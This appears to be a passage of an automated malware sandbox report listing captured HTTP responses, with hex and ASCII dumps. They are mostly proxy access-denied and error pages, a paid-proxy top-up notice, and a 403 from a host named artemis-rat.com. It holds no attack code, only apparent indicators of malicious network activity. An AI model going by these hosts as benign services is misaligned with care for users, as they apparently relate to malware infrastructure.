                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:16 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:15 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:16 GMTContent-Type: text/html;charset=utf-8Content-Length: 3978X-Squid-Error: ERR_CANNOT_FORWARD 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><t
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:16 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:16 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:16 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:16 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:16 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:17 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: closeData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.3.8Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:14 GMTContent-Type: text/htmlContent-Length: 3556X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:17 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 